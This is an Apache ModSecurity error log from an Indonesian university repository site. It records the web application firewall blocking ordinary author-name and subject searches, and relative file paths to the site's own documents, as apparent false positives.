[Mon Aug 28 12:37:25.551318 2023] [:error] [pid 42794] [client 47.128.21.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Alwin Abdussalam\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwylcCo-f0AAKcq2ecAAAAL"]
[Mon Aug 28 12:42:03.571377 2023] [:error] [pid 42798] [client 47.128.30.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fauji Ajiyasha\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwzq8Co-f0AAKcuO9EAAAAR"]
[Mon Aug 28 12:42:28.441148 2023] [:error] [pid 42754] [client 47.128.28.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Bentuk\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwzxMCo-f0AAKcCYYoAAAAI"]
[Mon Aug 28 12:45:21.114180 2023] [:error] [pid 42752] [client 47.128.30.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Erwin Yulianto\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw0ccCo-f0AAKcA6CIAAAAB"]
[Mon Aug 28 13:20:21.572391 2023] [:error] [pid 43590] [client 47.128.16.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Skripsi Arsitektur 2021\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw8pcCo-f0AAKpG538AAAAM"]
[Mon Aug 28 13:24:29.709673 2023] [:error] [pid 43590] [client 47.128.19.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nurul Fatikhah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw9ncCo-f0AAKpG56UAAAAM"]
[Mon Aug 28 13:26:29.836353 2023] [:error] [pid 43695] [client 47.128.20.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Cucu Iskandar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw@FcCo-f0AAKqv@JoAAAAh"]
[Mon Aug 28 13:27:27.976802 2023] [:error] [pid 43695] [client 47.128.17.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22analisis  ABC  dan   XYZ\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw@T8Co-f0AAKqv@J0AAAAh"]
[Mon Aug 28 13:36:09.122711 2023] [:error] [pid 43777] [client 47.128.23.248] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sistem Monitoring\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxAWcCo-f0AAKsBICYAAAAA"]
[Mon Aug 28 13:36:23.641216 2023] [:error] [pid 44061] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SK Ngajar_Dr.Sally Octaviana S,S,T.,M.T._Genap 2022-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxAZ8Co-f0AAKwdy-IAAAAC"]
[Mon Aug 28 13:39:25.100536 2023] [:error] [pid 44190] [client 47.128.31.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Gilang Lesmana\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxBHcCo-f0AAKyepQoAAAAM"]
[Mon Aug 28 13:42:04.719995 2023] [:error] [pid 44117] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SKEP Dekan Dr.Sally Octaviana S,S,T.,M.T._12-07-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxBvMCo-f0AAKxVivUAAAAS"]
[Mon Aug 28 13:43:01.927810 2023] [:error] [pid 44238] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//SKEP Dekan Dr.Sally Octaviana S,S,T.,M.T._12-07-2023.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxB9cCo-f0AAKzOr8EAAAAN"]
[Mon Aug 28 13:59:48.045608 2023] [:error] [pid 44557] [client 47.128.30.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22B. P. Iskandar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxF5MCo-f0AAK4NGkkAAAAR"]
[Mon Aug 28 13:59:48.241038 2023] [:error] [pid 44557] [client 47.128.30.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22B. P. Iskandar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxF5MCo-f0AAK4NGkoAAAAR"]
[Mon Aug 28 14:04:55.776883 2023] [:error] [pid 44649] [client 47.128.24.165] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22twodimensional maintenance region\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxHF8Co-f0AAK5pvJ4AAAAA"]
[Mon Aug 28 14:11:25.373246 2023] [:error] [pid 44723] [client 47.128.27.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_-_24._Cost_analysis_of_warranty_based_on_lemon_law_with_multiple_failures_and_total_downtime.j"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxIncCo-f0AAK6zwmIAAAAN"]
[Mon Aug 28 14:12:49.820606 2023] [:error] [pid 44851] [client 47.128.25.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Gedebage Shopping mall\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxI8cCo-f0AAK8zpC0AAAAO"]
[Mon Aug 28 14:19:16.267146 2023] [:error] [pid 44808] [client 47.128.19.226] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ferry Ariessahi Fadillah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxKdMCo-f0AAK8ID98AAAAG"]
[Mon Aug 28 14:20:12.231225 2023] [:error] [pid 44869] [client 47.128.28.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22NABILLA YUSUF\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxKrMCo-f0AAK9F6sMAAAAU"]
[Mon Aug 28 14:31:41.168676 2023] [:error] [pid 45055] [client 47.128.29.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Valas\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxNXcCo-f0AAK--EkIAAAAI"]
[Mon Aug 28 14:43:32.125251 2023] [:error] [pid 45300] [client 47.128.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22force of terrorist influence\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxQJMCo-f0AALD019cAAAAj"]
[Mon Aug 28 14:54:59.266874 2023] [:error] [pid 45521] [client 52.167.144.234] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22pembayaran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxS08Co-f0AALHRl7wAAAAR"]
[Mon Aug 28 14:55:31.339125 2023] [:error] [pid 45515] [client 47.128.23.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EFAS (Eksternal Strategic Factors Anlysis Summary \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxS88Co-f0AALHLdOIAAAAG"]
[Mon Aug 28 15:13:37.292197 2023] [:error] [pid 45837] [client 47.128.27.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Turnitin_-_34._Premium_Estimation_In_The_Fire_Insurance_Through_Semiparametric_Bootstrap.png.png"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxXMcCo-f0AALMN81wAAAAP"]
[Mon Aug 28 15:20:14.337318 2023] [:error] [pid 45976] [client 47.128.25.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Turnitin_-_16._Modelling_two-dimensional_lease_contract_with_preventive_maintenance_and_servicing_st"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryft.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxYvsCo-f0AALOYBl0AAAAW"]
[Mon Aug 28 15:21:15.993110 2023] [:error] [pid 46061] [client 47.128.31.236] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ridwan Alfian Noor\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxY@8Co-f0AALPtM8cAAAAQ"]
[Mon Aug 28 15:36:45.068119 2023] [:error] [pid 46357] [client 65.108.40.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22N.F. Sa\\xe2\\x80\\x99idah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxcncCo-f0AALUVb2QAAAAW"]
[Mon Aug 28 15:36:46.737949 2023] [:error] [pid 46357] [client 65.108.40.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sany Ni\\xe2\\x80\\x99ma Fauzia\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxcnsCo-f0AALUVb2UAAAAW"]
